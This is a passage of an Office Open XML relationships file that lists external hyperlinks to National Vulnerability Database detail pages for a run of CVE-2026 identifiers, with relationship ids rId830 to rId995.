Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6734" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68561" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69258" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69857" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70178" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70456" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70458" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71694" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71808" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72866" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72875" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72883" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73222" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73224" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73226" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73284" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73293" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73305" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73667" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73753" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73763" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73784" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73841" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74997" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75007" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75161" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75166" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75169" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75339" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75624" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75777" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76059" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76647" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76801" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77826" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78569" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78571" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78575" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 